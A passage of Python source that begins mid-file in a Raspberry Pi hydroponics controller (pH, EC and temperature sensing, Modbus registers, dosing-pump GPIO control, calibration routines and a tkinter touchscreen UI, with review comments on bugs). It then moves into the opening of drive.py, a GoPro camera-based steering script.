        if pH2 > 1400:
            pH2 = 650

        slave_id = 0x02
        address = 0x00
        contxt = a.context[slave_id]

        # Mirror the four digital inputs into discrete-input registers 0..3.
        DI1 = GPIO.input(channel1)
        DI2 = GPIO.input(channel2)
        DI3 = GPIO.input(channel3)
        DI4 = GPIO.input(channel4)
        contxt.setValues(1, 0x00, DI1)
        contxt.setValues(1, 0x01, DI2)
        contxt.setValues(1, 0x02, DI3)
        contxt.setValues(1, 0x03, DI4)

        # Publish the analog readings to holding registers 0..2.
        contxt.setValues(3, 0x00, pH2)
        # BUG FIX: was ``ec2``, a name that only exists in commented-out
        # code above — every loop iteration raised NameError.
        contxt.setValues(3, 0x01, ECACT)
        contxt.setValues(3, 0x02, temp2)
if __name__ == "__main__":
    # NOTE(review): run_server() is expected to block serving requests, so
    # the statements below it are likely never reached; updatevalues() is
    # also called here without the server argument it requires (see its
    # def above) and would raise TypeError — confirm the intended startup
    # sequence.
    while True:
        run_server()
        updatevalues()
        time.sleep(10)
def submit1():
    """Background worker: continuously polls the EC circuit and the
    temperature probe.  The readings are converted but (apart from the
    commented-out GPIO dosing logic below) currently discarded — this runs
    as a daemon thread started at module import.
    """
    PH = AtlasOEM_PH(name = "PH") # create an OEM PH object
    EC = AtlasOEM_EC(name = "EC") # create an OEM EC object
    #DO = AtlasOEM_DO(name = "DO") # create an OEM DO object
    #PH.write_active_hibernate(1) # tell the circuits to start taking readings
    EC.write_active_hibernate(1)
    #DO.write_active_hibernate(1)
    def get_OEM_reading(OEM_circuit, readfunction): # creates a closure to take readings for each circuit
        reading = [1] # we use a list to approximate a static variable to cache previous readings
        def OEM_reading_closure(): # make a custom function to do the readings
            if OEM_circuit.read_new_reading_available(): # if we have a new reading
                reading[0] = readfunction() # get it from the circuit
                #print("OEM " + OEM_circuit.get_name() + \
                #      " reading: " + str(reading)) # print the reading
                OEM_circuit.write_new_reading_available(0) # then clear the new reading register
                # so the circuit can set the register
                # high again when it acquires a new reading
            return reading[0] # return the value in the list
        return OEM_reading_closure # return the custom function without calling it, so we can call it when we want readings
    def get_all_EC_values(): # we can gt all 3 EC values by returning them in a list
        EC_val = EC.read_EC_reading()
        #TDS_val = EC.read_TDS_reading()
        #sal_val = EC.read_salinitiy_reading()
        return EC_val #,TDS_val, sal_val]
    #read_pH = get_OEM_reading(PH, PH.read_PH_reading) #assign the closures so we can call them to get readings
    read_EC = get_OEM_reading(EC, get_all_EC_values)
    #read_pH = float("{0:.1f}".format(read_pHraw))
    #read_EC = float("{0:.1f}".format(ead_ECraw))
    #read_DO = get_OEM_reading(DO, DO.read_DO_reading)
    #time.sleep(20)
    # give circuits time to get the initial readings
    def read_temp():
        # Sets up its own SPI bus + MAX31865 RTD amplifier and returns the
        # temperature rounded to one decimal.  Also publishes it via the
        # module-level ``temp`` global for other readers.
        spi = board.SPI()
        cs = digitalio.DigitalInOut(board.D5) # Chip select of the MAX31865 board.
        sensor = adafruit_max31865.MAX31865(spi, cs)
        global temp
        # Read temperature.
        tempraw = sensor.temperature
        temp = float("{0:.1f}".format(tempraw))
        #temp2 = temp*
        # Print the value.
        #print("Temperature: {0:0.1f}C".format(temp))
        # Delay for a second.
        return temp
    while True:
        ec_val = read_EC() #take readings from the closures
        #ph_val = read_pH()
        temp_val=read_temp()
        # time.sleep(10)
        #do_val = read_DO()
        #var2.set(f'PH:{ph_val:}')
        #var1.set(f'EC:{ec_val:}')
        #var20.set(f'Temperature:{temp_val:}')
        #print("EC:" + str(ec_val), "Temperature:" + str(temp) # print the readings
        #+ "\t PH:" + str(ph_val))
        # NOTE(review): ECT2 is computed but never used — the remaining
        # per-threshold GPIO logic below is commented out.
        ECT = ec_val
        ECT2=int(ECT)
        #ECT2 = 500
        #PHT = ph_val
        #print(ECT2)
        #print(str(PHT))
        #print(str(ECT))
        #print(numbr2)
        #print(number1)
        #GPIO.output(EC_HIGH, GPIO.LOW)
        #GPIO.output(EC_HIGH, GPIO.HIGH)
        #if(number == 0):
        #GPIO.output(PH_LOW, GPIO.LOW)
        #GPIO.output(PH_HIGH, GPIO.LOW)
        #GPIO.output(EC_LOW, GPIO.LOW)
        #GPIO.output(EC_HIGH, GPIO.LOW)
        #elif(number1==0):
        #GPIO.output(PH_LOW, GPIO.LOW)
        #GPIO.output(PH_HIGH, GPIO.LOW)
        #GPIO.output(EC_LOW, GPIO.LOW)
        #GPIO.output(EC_HIGH, GPIO.LOW)
        #elif(number2==0):
        #GPIO.output(PH_LOW, GPIO.LOW)
        #GPIO.output(PH_HIGH, GPIO.LOW)
        #GPIO.output(EC_LOW, GPIO.LOW)
        #GPIO.output(EC_HIGH, GPIO.LOW)
        #elif(ECT > 0):
        #GPIO.output(EC_HIGH, GPIO.HIGH)
        #
def read_sensor():
    """Main sensing/dosing worker (runs forever on a daemon thread).

    Polls pH, EC and temperature, publishes them to the tkinter display
    variables (var1/var2/var20), and drives the dosing-pump GPIO outputs
    against the user-set thresholds:
      number  -- pH low set-point, number1 -- pH high set-point,
      number2 -- EC set-point (presumably; TODO confirm against the UI).
    """
    PH = AtlasOEM_PH(name = "PH") # create an OEM PH object
    EC = AtlasOEM_EC(name = "EC") # create an OEM EC object
    #DO = AtlasOEM_DO(name = "DO") # create an OEM DO object
    PH.write_active_hibernate(1) # tell the circuits to start taking readings
    EC.write_active_hibernate(1)
    #DO.write_active_hibernate(1)
    def get_OEM_reading(OEM_circuit, readfunction): # creates a closure to take readings for each circuit
        reading = [1] # we use a list to approximate a static variable to cache previous readings
        def OEM_reading_closure(): # make a custom function to do the readings
            if OEM_circuit.read_new_reading_available(): # if we have a new reading
                reading[0] = readfunction() # get it from the circuit
                #print("OEM " + OEM_circuit.get_name() + \
                #      " reading: " + str(reading)) # print the reading
                OEM_circuit.write_new_reading_available(0) # then clear the new reading register
                # so the circuit can set the register
                # high again when it acquires a new reading
            return reading[0] # return the value in the list
        return OEM_reading_closure # return the custom function without calling it, so we can call it when we want readings
    #time.sleep(10)
    def get_all_EC_values(): # we can gt all 3 EC values by returning them in a list
        EC_val = EC.read_EC_reading()
        #TDS_val = EC.read_TDS_reading()
        #sal_val = EC.read_salinitiy_reading()
        return EC_val #,TDS_val, sal_val]
    read_pH = get_OEM_reading(PH, PH.read_PH_reading) #assign the closures so we can call them to get readings
    read_EC = get_OEM_reading(EC, get_all_EC_values)
    #read_pH = float("{0:.1f}".format(read_pHraw))
    #read_EC = float("{0:.1f}".format(ead_ECraw))
    #read_DO = get_OEM_reading(DO, DO.read_DO_reading)
    #time.sleep(10)
    # give circuits time to get the initial readings
    def read_temp():
        # NOTE(review): uses a module-level ``sensor`` object — confirm it
        # is initialised before this thread starts.
        #global temp
        # Read temperature.
        tempraw = sensor.temperature
        temp = float("{0:.1f}".format(tempraw))
        # Print the value.
        #print("Temperature: {0:0.1f}C".format(temp))
        # Delay for a second.
        #time.sleep(15)
        return temp
    time.sleep(10)
    while True:
        ec_val = read_EC() #take readings from the closures
        ph_val = read_pH()
        temp_val=read_temp()
        time.sleep(10)
        # Format readings to one decimal, clamping implausible spikes.
        ec = ec_val
        ph = ph_val
        ec_2 = float(ec)
        if(ec_2 > 10000):
            ec_2 = 1500.5
        ec_1 = "{:.1f}".format(ec_2)
        Temp = temp_val
        Tempgate = Temp
        temp1 = "{:.1f}".format(Tempgate)
        pH2 = float(ph)
        if(pH2 > 14.0):
            pH2 = 6.5
        format_float = "{:.1f}".format(pH2)
        format_float7 = str(float(format_float))
        #format_float5 = int(format_float)
        #format_float = "{:.1f}".format(ph)
        #format_float1 = "{:.0f}".format(ec)
        # Publish to the tkinter display variables.
        var2.set("{}".format(format_float7))
        var1.set("{}".format(ec_1))
        var20.set("{}".format(temp1))
        #print("EC:" + str(ec_val), "Temperature:" + str(temp) # print the readings
        #       + "\t PH:" + str(ph_val))
        ECT = ec_val
        ECT2=ECT
        PHT = ph_val
        PHT2 = PHT
        #print(ECT2)
        #print(str(PHT))
        #print(str(ECT))
        #time.sleep(10)
        #GPIO.output(EC_HIGH, GPIO.LOW)
        #GPIO.output(EC_HIGH, GPIO.HIGH)
        # Dosing control: a threshold of 0 disables the corresponding pumps;
        # otherwise pump "up" below the low set-point, "down" above the high.
        if(number == 0):
            GPIO.output(PH_LOW, GPIO.LOW)
            GPIO.output(PH_HIGH, GPIO.LOW)
            #GPIO.output(EC_LOW, GPIO.LOW)
            #GPIO.output(EC_HIGH, GPIO.LOW)
        elif(number1==0):
            GPIO.output(PH_LOW, GPIO.LOW)
            GPIO.output(PH_HIGH, GPIO.LOW)
            #GPIO.output(EC_LOW, GPIO.LOW)
            #GPIO.output(EC_HIGH, GPIO.LOW)
        elif(number2==0):
            #GPIO.output(PH_LOW, GPIO.LOW)
            #GPIO.output(PH_HIGH, GPIO.LOW)
            GPIO.output(EC_LOW, GPIO.LOW)
            GPIO.output(EC_HIGH, GPIO.LOW)
        elif(PHT2 < number):
            GPIO.output(PH_HIGH, GPIO.HIGH)
            GPIO.output(PH_LOW, GPIO.LOW)
        elif(PHT2 > number1):
            GPIO.output(PH_LOW, GPIO.HIGH)
            GPIO.output(PH_HIGH, GPIO.LOW)
        #GPIO.output(EC_LOW, GPIO.HIGH)
        #elif(ECT2 > number2):
        #    GPIO.output(27, GPIO.HIGH)
        print(number1)
        #GPIO.output(EC_LOW, GPIO.HIGH)
        # NOTE(review): this compares the EC reading against the pH high
        # set-point (number1); the commented-out line above suggests the EC
        # threshold number2 was intended — confirm before relying on it.
        if(ECT2 > number1):
            GPIO.output(27, GPIO.LOW)
def submit(number1):
    # NOTE(review): the converted entry value is assigned to the *local*
    # name ``number1``, shadowing the parameter — nothing outside this
    # function changes, so the Submit button only prints the value.
    # Confirm whether the module-level threshold (number1 or number2) was
    # meant to be updated here.
    number2=numbr2.get()
    number1 = int(number2)
    print(number1)
def Cal_4_Mode(var3):
    """Run the LOW-point calibration (pH 4.00 buffer) on the pH circuit.

    ``var3`` is the tkinter status variable (currently unused — the status
    updates are commented out upstream).
    """
    print("Entering CAL 4.0 Mode")
    probe = AtlasOEM_PH()               # OEM pH circuit
    probe.write_active_hibernate(1)     # wake the circuit so it samples
    probe.read_calibration_data()
    probe.write_calibration_request(0)  # calibration slot 0 = low point
    probe.write_calibration_data(4.00)
    messagebox.showinfo("Calibration 4.0", "Calibration in progress Please Wait")
    time.sleep(10)                      # let the calibration settle
    cal_confirm = probe.read_calibration_confirm()
    cal_data = probe.read_calibration_data()
    print("OEM pH CAL reading: " + str(cal_data))
    print("OEM pH CALCONF reading: " + str(cal_confirm))
def Cal_7_Mode(var4):
    """Run the MID-point calibration (pH 7.00 buffer) on the pH circuit.

    ``var4`` is the tkinter status variable (currently unused).
    """
    print("Entering CAL 7.0 Mode")
    probe = AtlasOEM_PH()               # OEM pH circuit
    probe.write_active_hibernate(1)     # wake the circuit so it samples
    probe.read_calibration_data()
    probe.write_calibration_request(1)  # calibration slot 1 = mid point
    probe.write_calibration_data(7.00)
    messagebox.showinfo("Calibration 7.0","Calibration in progress Please Wait")
    time.sleep(10)                      # let the calibration settle
    cal_confirm = probe.read_calibration_confirm()
    cal_data = probe.read_calibration_data()
    print("OEM pH CAL reading: " + str(cal_data))
    print("OEM pH CALCONF reading: " + str(cal_confirm))
def Cal_10_Mode(var5):
    """Run the HIGH-point calibration (pH 10.00 buffer) on the pH circuit.

    ``var5`` is the tkinter status variable (currently unused).
    """
    print("Entering CAL 10.0 Mode")
    probe = AtlasOEM_PH()               # OEM pH circuit
    probe.write_active_hibernate(1)     # wake the circuit so it samples
    probe.read_calibration_data()
    probe.write_calibration_request(2)  # calibration slot 2 = high point
    probe.write_calibration_data(10.00)
    messagebox.showinfo("Calibration 10.0","Calibration in progress Please Wait")
    time.sleep(10)                      # let the calibration settle
    cal_confirm = probe.read_calibration_confirm()
    cal_data = probe.read_calibration_data()
    print("OEM pH CAL reading: " + str(cal_data))
    print("OEM pH CALCONF reading: " + str(cal_confirm))
def Cal_EC_Mode(var6):
    """Single-point EC calibration against a 1413 uS/cm standard solution.

    ``var6`` is the tkinter status variable (currently unused).
    """
    print("Entering CAL EC Mode")
    EC = AtlasOEM_EC(name = "EC")        # OEM conductivity circuit
    EC.write_active_hibernate(1)         # wake the circuit so it samples
    if EC.read_new_reading_available():  # drop any pending reading first
        EC.write_new_reading_available(0)
    EC.read_calibration_data()
    EC_CalData = EC.read_calibration_data()
    print("OEM EC CAL reading: " + str(EC_CalData))
    EC.write_calibration_data(1413)      # 1413 uS/cm reference value
    EC.write_calibration_request(3)      # request single-point calibration
    messagebox.showinfo("Calibration EC 1413","Calibration in progress Please Wait")
    time.sleep(10)                       # let the calibration settle
    EC_ReadCal = EC.read_calibration_confirm()
    # BUG FIX: this log line previously said "OEM pH CALCONF" even though
    # it reports the EC circuit's confirmation.
    print("OEM EC CALCONF reading: " + str(EC_ReadCal))
def Cal_DeletePH_Mode():
    """Erase the pH circuit's stored calibration by writing 0 to slot 0."""
    probe = AtlasOEM_PH()               # OEM pH circuit
    probe.write_active_hibernate(1)     # wake the circuit so it responds
    probe.read_calibration_data()
    probe.write_calibration_request(0)
    probe.write_calibration_data(0)     # zero = clear stored calibration
    time.sleep(5)                       # give the circuit time to apply it
    cal_confirm = probe.read_calibration_confirm()
    cal_data = probe.read_calibration_data()
    print("OEM pH CAL reading: " + str(cal_data))
    print("OEM pH CALCONF reading: " + str(cal_confirm))
def PH_plus():
    """Raise the pH set-point by 0.5 (capped at 14) and show it in the entry."""
    global number
    maxN = 14
    number += 0.5
    number = min(maxN, number)
    # BUG FIX: tkinter's StringVar.set() takes the new value positionally;
    # set(text=...) raised TypeError (the text= keyword belongs to
    # Label.config(), as used by PH_plus1/PH_minus1).
    numbr.set(str(number))
    print(number)
def PH_minus():
    """Lower the pH set-point by 0.5 (floored at 0) and show it in the entry."""
    global number
    minN = 0
    number -= 0.5
    number = max(minN, number)
    # BUG FIX: StringVar.set() takes the value positionally; set(text=...)
    # raised TypeError.
    numbr.set(str(number))
    print(number)
def PH_plus1():
    """Nudge the upper pH threshold up by half a unit, capped at 14."""
    global number1
    number1 = min(14, number1 + 0.5)
    label6.config(text=number1)  # reflect the new threshold in the UI
    print(number1)
def PH_minus1():
    """Nudge the upper pH threshold down by half a unit, floored at 0."""
    global number1
    number1 = max(0, number1 - 0.5)
    label6.config(text=number1)  # reflect the new threshold in the UI
    print(number1)
def EC_plus():
    """Raise the EC set-point by 10 (capped at 5000) and show it in the entry."""
    global number2
    maxN = 5000
    number2 += 10
    number2 = min(maxN, number2)
    # BUG FIX: StringVar.set() takes the value positionally; set(text=...)
    # raised TypeError.
    numbr2.set(str(number2))
    print(number2)
def EC_minus():
    """Lower the EC set-point by 10 (floored at 0) and show it in the entry."""
    global number2
    minN = 0
    number2 -= 10
    number2 = max(minN, number2)
    # BUG FIX: StringVar.set() takes the value positionally; set(text=...)
    # raised TypeError.
    numbr2.set(str(number2))
    print(number2)
def EC_plus1():
    """Raise the lower EC threshold by one step (capped at 5000)."""
    global number3
    maxN = 5000
    # BUG FIX: the step was 0, which made this button a no-op; use the same
    # 10-unit step as EC_plus. TODO confirm the intended step size.
    number3 += 10
    number3 = min(maxN, number3)
    label8.config(text=number3)
    print(number3)
def EC_minus1():
    """Lower the lower EC threshold by one step (floored at 0)."""
    global number3
    minN = 0
    # BUG FIX: the step was 0, which made this button a no-op; use the same
    # 10-unit step as EC_minus. TODO confirm the intended step size.
    number3 -= 10
    number3 = max(minN, number3)
    label8.config(text=number3)
    print(number3)
def start_Cal4_Mode(var3):
    """Run the pH 4.0 calibration on a worker thread so the UI stays live."""
    threading.Thread(target=Cal_4_Mode, args=(var3,)).start()
def start_Cal7_Mode(var4):
    """Run the pH 7.0 calibration on a worker thread so the UI stays live."""
    threading.Thread(target=Cal_7_Mode, args=(var4,)).start()
def start_Cal10_Mode(var5):
    """Run the pH 10.0 calibration on a worker thread so the UI stays live."""
    threading.Thread(target=Cal_10_Mode, args=(var5,)).start()
def start_CalEC_Mode(var6):
    """Run the EC calibration on a worker thread so the UI stays live."""
    threading.Thread(target=Cal_EC_Mode, args=(var6,)).start()
def start_CalDeletePH_Mode(var7):
    """Run the pH calibration-erase routine on a worker thread.

    ``var7`` is accepted to keep the caller interface consistent with the
    other start_* helpers, but is not forwarded: Cal_DeletePH_Mode takes
    no arguments.
    """
    # BUG FIX: previously args=(var7,) was passed, so the worker thread
    # died immediately with TypeError (Cal_DeletePH_Mode() has no params).
    t = threading.Thread(target=Cal_DeletePH_Mode)
    t.start()
#Thread(target = loop2).terminate()
# create the thread
# Background workers (daemon threads die with the main tkinter thread).
# NOTE(review): read_sensor writes var1/var2/var20, which are only created
# below after the threads start — there is a startup race; confirm
# read_sensor's initial sleep is long enough to cover it.
task = threading.Thread(target=read_sensor, daemon=True)
task1 = threading.Thread(target=helloCallBack3, daemon=True)
task2 = threading.Thread(target=submit1, daemon=True)
task2.start()
task.start()
task1.start()
root = tk.Tk()
# Preload supplies the screen images (loadingScreen, mainScreen, menuScreen,
# button images) used by MainScreen below.
from Preload import *
##root.geometry('800x400')
#bg = PhotoImage(file = "farmfluence-Logo.png")
#canvas1 = Canvas(root, width = 800,
#height = 450)
#canvas1.grid(row=0,column=1)
#canvas1.pack(fill=Tkinter.BOTH)
# Display image
#canvas1.create_image(0, 0, image = bg, anchor = "nw")
# Add Text
#canvas1.create_text( 200, 250, text = "Welcome")
#root.geometry("1024x800")
##root.title("PH EC Controller")
#bg = PhotoImage(file ="farmfluence-Logo.png")
var2 = tk.StringVar()#PH display value
var1 = tk.StringVar()#EC display value
var20 = tk.StringVar() #Temp display value
var3 = tk.StringVar()  # calibration status variables (currently unused)
var4 = tk.StringVar()
var5 = tk.StringVar()
var6 = tk.StringVar()
numbr=tk.StringVar()   # pH set-point entry value
numbr2=tk.StringVar()  # EC set-point entry value
##label = tk.Label(root, text=number, width=5, height=2, font=('calibri', 15, 'bold'))
##label.grid(row=3,column=11)
##label3 = tk.Label(root, text="PH HIGH", width=10, height=2, font=('calibri', 12, 'bold'))
##label3.grid(row=2,column=11)
##label4 = tk.Label(root, text="Thresholds", width=10, height=2, font=('calibri', 15, 'bold'))
##label4.grid(row=1,column=12)
##label5 = tk.Label(root, text="PH LOW", width=10, height=2, font=('calibri', 12, 'bold'))
##label5.grid(row=5,column=11)
##label6 = tk.Label(root, text=number1, width=5, height=2, font=('calibri', 15, 'bold'))
##label6.grid(row=6,column=11)
##label7 = tk.Label(root, text=number2, width=5, height=2, font=('calibri', 15, 'bold'))
##label7.grid(row=3,column=12)
##label8 = tk.Label(root, text=number3, width=5, height=2, font=('calibri', 15, 'bold'))
##label8.grid(row=6,column=12)
##label5 = tk.Label(root, text="EC HIGH", width=10, height=2, font=('calibri', 12, 'bold'))
##label5.grid(row=2,column=12)
##label5 = tk.Label(root, text="EC LOW", width=10, height=2, font=('calibri', 12, 'bold'))
##label5.grid(row=5,column=12)
###label = tk.Label(root, text="PH_HIGH Input")
###label.grid(row=4,column=10)
##b = tk.Button(root, text="Cal 4.0", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_Cal4_Mode(var3))
##b.grid(row=2,column=0)
##c = tk.Button(root, text="Cal 7.0", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_Cal7_Mode(var4))
##c.grid(row=1,column=0)
##d = tk.Button(root, text="Cal 10.0", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_Cal10_Mode(var5))
##d.grid(row=3,column=0)
##e = tk.Button(root, text="Cal EC", width=8, height=1, bg="black", fg = "white",font=("calibri",14), command=lambda: start_CalEC_Mode(var6))
##e.grid(row=4,column=0)
##b1=tk.Button(root, text="Trend PH",bg="black", fg = "white",font=("calibri",14),command=helloCallBack1)
##b1.grid(row=5, column=0)
##b2=tk.Button(root, text="Trend EC",bg="black", fg = "white",font=("calibri",14),command=helloCallBack2)
##b2.grid(row=6, column=0)
###b3=tk.Button(frame, text="Trend Temperature", font=dfont,bg="white",command=animate)
###b3.grid(row=28, column=2, padx=5, pady=5)
##PH_plus = tk.Button(root, text="PH +", bg="black", fg = "white", command=PH_plus, font=("calibri", 12))
##PH_plus.grid(row=4,column=10)
##PH_minus = tk.Button(root, text="PH -", bg="black", fg = "white", command=PH_minus, font=("calibri", 12))
##PH_minus.grid(row=4,column=11)
##
##PH_plus1 = tk.Button(root, text="PH +", bg="black", fg = "white", command=PH_plus1, font=("calibri", 12))
##PH_plus1.grid(row=7,column=10)
##PH_minus1 = tk.Button(root, text="PH -", bg="black", fg = "white", command=PH_minus1, font=("calibri", 12))
##PH_minus1.grid(row=7,column=11)
##
##EC_plus = tk.Button(root, text="EC +", bg="black", fg = "white", command=EC_plus, font=("calibri", 12))
##EC_plus.grid(row=4,column=12)
##EC_minus = tk.Button(root, text="EC -", bg="black", fg = "white", command=EC_minus, font=("calibri", 12))
##EC_minus.grid(row=4,column=13)
##
##EC_plus1 = tk.Button(root, text="EC +", bg="black", fg = "white", command=EC_plus1, font=("calibri", 12))
##EC_plus1.grid(row=7,column=12)
##EC_minus1 = tk.Button(root, text="EC -", bg="black", fg = "white", command=EC_minus1, font=("calibri", 12))
##EC_minus1.grid(row=7,column=13)
#################################
#################################
#################################
class MainScreen:
    """Three-screen tkinter UI: loading splash -> main readings screen ->
    settings/calibration menu.

    Each screen Label keeps a reference to its PhotoImage on itself
    (``widget.image = ...``) so the image is not garbage collected while
    displayed.
    """
    def __init__(self, win):
        # Splash screen, swapped for the main screen after 2 seconds.
        load_C = Label(root, bg="#eaebef", image=loadingScreen,height=450, width=800)
        # BUG FIX: the keep-alive reference must point at the image actually
        # displayed (was mainScreen, letting loadingScreen be GC'd and the
        # splash go blank).
        load_C.image=loadingScreen
        load_C.place(x=0,y=0)
        root.after(2000,self.main_Screen)
    def main_Screen(self):
        """Show the live-readings screen (pH / EC / temperature)."""
        main_C = Label(root, bg="#eaebef", image=mainScreen,height=450, width=800)
        main_C.image=mainScreen
        main_C.place(x=0,y=0)
        lbl = tk.Label(main_C, textvariable=var2, width=5,bg='#d6dbbd',anchor='center', height=1, font=('calibri', 20, 'bold')) ##PH Display
        lbl.place(x=130,y=180)
        lbl1 = tk.Label(main_C, textvariable=var1, width=5,bg='#d6dbbd', height=1,anchor='center', font=('calibri', 20, 'bold'))##EC Display
        lbl1.place(x=360,y=180)
        lbl2 = tk.Label(main_C, textvariable=var20, width=5,bg='#d6dbbd', height=1,anchor='center', font=('calibri', 20, 'bold'))## Temp Display
        lbl2.place(x=590,y=180)
        menu_Btn=Button(main_C,image=menuBtn,command=self.menu_Screen,relief=FLAT,
                        fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        menu_Btn.place(x=20,y=380)
    def menu_Screen(self):
        """Show the settings/calibration screen (thresholds, cal buttons,
        on-screen numeric keypad)."""
        def KeyPress(i):
            # Injects the pressed digit as a real key event so it lands in
            # whichever Entry currently has focus.
            from pynput.keyboard import Key, Controller
            keyboard=Controller()
            keyboard.press(str(i))
            keyboard.release(str(i))
        menu_C = Label(root, bg="#eaebef", image=menuScreen,height=450, width=800)
        # BUG FIX: keep-alive reference was mainScreen; it must hold the
        # menuScreen image actually shown here.
        menu_C.image=menuScreen
        menu_C.place(x=0,y=0)
        highPH_Btn=Button(menu_C,image=highBtn,command=PH_plus,relief=FLAT,#PH_PLUS
                          fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        highPH_Btn.place(x=20,y=100)
        entry_PH = Entry (menu_C,textvariable=numbr,relief=SUNKEN,font=('calibri', 20, 'bold'),highlightbackground='BLACK',
                          fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=1,justify=CENTER)
        entry_PH.place(x=20,y=170,height=45,width=150)
        lowPH_Btn=Button(menu_C,image=lowBtn,command=PH_minus,relief=FLAT,
                         fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)##PH_MINUS
        lowPH_Btn.place(x=20,y=240)
        cal4_Btn=Button(menu_C,image=cal4Btn,command=lambda: start_Cal4_Mode(var3),relief=FLAT,##CAL 4
                        fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        cal4_Btn.place(x=20,y=310)
        cal7_Btn=Button(menu_C,image=cal7Btn,command=lambda: start_Cal7_Mode(var4),relief=FLAT,##CAL 7
                        fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        cal7_Btn.place(x=20,y=380)
        highEC_Btn=Button(menu_C,image=highBtn,command=EC_plus,relief=FLAT, ##EC_PLUS
                          fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        highEC_Btn.place(x=200,y=100)
        entry_EC= Entry (menu_C,textvariable=numbr2,relief=SUNKEN,font=('calibri', 20, 'bold'),highlightbackground='BLACK',
                         fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=1,justify=CENTER)
        entry_EC.place(x=200,y=170,height=45,width=150)
        lowEC_Btn=Button(menu_C,image=lowBtn,command=EC_minus,relief=FLAT, ## EC_MINUS
                         fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        lowEC_Btn.place(x=200,y=240)
        calEC_Btn=Button(menu_C,image=cal14Btn,command=lambda: start_CalEC_Mode(var6),relief=FLAT, ## Calibrate EC
                         fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        calEC_Btn.place(x=200,y=310)
        empty_Btn=Button(menu_C,image=emptBtn,command=self.menu_Screen,relief=FLAT, ##Back to main screen
                         fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        empty_Btn.place(x=200,y=380)
        reset_Btn=Button(menu_C,image=resetBtn,command=self.menu_Screen,relief=FLAT,###Reset command here
                         fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        reset_Btn.place(x=380,y=100)
        reboot_Btn=Button(menu_C,image=rebootBtn,relief=FLAT,###Reboot button, add your own command here
                          fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        reboot_Btn.place(x=380,y=170)
        graph_Btn=Button(menu_C,image=menuBtn,command=helloCallBack1,relief=FLAT,###PH graph screen button
                         fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        graph_Btn.place(x=380,y=240)
        empty_Btn2=Button(menu_C,image=emptBtn,command=self.main_Screen,relief=FLAT, ###Back to main screen button
                          fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        empty_Btn2.place(x=380,y=310)
        submit_btn=Button(menu_C,text="Submit",height=2, width=20,command=lambda: submit(number1),relief=FLAT,
                          fg='BLACK',bg='#F7F7F7',bd=0,highlightthickness=0,borderwidth=0)
        submit_btn.place(x=570,y=370)
        # On-screen keypad: digits 0-8 in a 3x3 grid, 9 on a wide bottom key.
        buttons=[0,0,0,0,0,0,0,0,0,0]
        frame = Frame(root)
        frame.place(x=560,y=100)
        a=0
        for j in range(3):
            for i in range(3):
                # lambda j=a binds the digit at creation time (late-binding fix)
                buttons[a]=Button(frame,text=str(a),height=3,width=5,command=lambda j=a:KeyPress(j))
                buttons[a].grid(column=i,row=j)
                a=a+1
        buttons[9]=Button(frame,text=str(9),width=10,height=3,command=lambda j=a:KeyPress(j))
        buttons[9].grid(column=0,row=4,columnspan=3)
mywin=MainScreen(root)  # shows the loading splash, then the main screen
root.title('Budan Farms')
root.geometry("800x450+0+0")  # fixed 800x450 window at the top-left corner
##root.attributes("-fullscreen", True)
root.mainloop()  # enter the tk event loop (blocks until the window closes)
|
drive.py
|
#%%
import time
import numpy as np
import cv2
import torch
import random
import logging
import threading
from goprocam import GoProCamera
from actuation import Controller
from driving_agents import CenterOfMassFollower as Agent
# Steering gain: the agent's predicted angle is multiplied by this before
# being sent to the actuators.
MOVE_COEFF = 3
# Random output filename so successive drives don't overwrite each other.
VIDEO_NAME = str(random.randint(0, 10**6))+'.mp4'
logging.basicConfig(
    format='%(asctime)s:%(levelname)s:%(message)s',
    filename='driving.log',
    # encoding='utf8',
    level=logging.DEBUG)
# bufferless VideoCapture
class VideoCapture:
    """Bufferless wrapper around cv2.VideoCapture.

    A daemon thread continuously grab()s frames so that read() always
    retrieves the most recent one instead of draining a stale OS buffer.
    read() returns cv2's ``(ret, frame)`` pair.
    """

    def __init__(self, name):
        self.cap = cv2.VideoCapture(name)
        # BUG FIX: set the run flag *before* starting the reader thread
        # (it was previously set after start(), a startup race).
        self.run = True
        # BUG FIX: initial cache now matches cv2.retrieve()'s (ret, frame)
        # shape, so callers can always unpack read()'s result — previously
        # a bare array was returned until the first retrieve() succeeded.
        self.last = (False, np.zeros((224, 224, 3)))
        self.t = threading.Thread(target=self._reader)
        self.t.daemon = True
        self.t.start()

    # grab frames as soon as they are available
    def _reader(self):
        # BUG FIX: honour the run flag so release() actually stops the
        # thread (it previously looped until the stream ended).
        while self.run:
            if not self.cap.grab():
                break

    # retrieve latest frame
    def read(self):
        """Return (ret, frame) for the most recently grabbed frame."""
        try:
            self.last = self.cap.retrieve()
        except Exception as e:
            # keep returning the cached frame on transient decode errors
            print(e)
        return self.last

    def release(self):
        self.run = False
        time.sleep(1)  # give the reader thread time to observe the flag
        self.cap.release()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("using" + str(device))
#%%
# Driving agent and motor controller.
# NOTE(review): second Agent arg (1/100*3.14) looks like an angle in
# radians — confirm against CenterOfMassFollower's signature.
agent = Agent(device, 1/100*3.14)
controller = Controller()
controller.zero()  # centre the actuators before driving
#%%
# GoPro streams over UDP to localhost:10000; every overlaid frame is also
# recorded to disk under driving_outputs/.
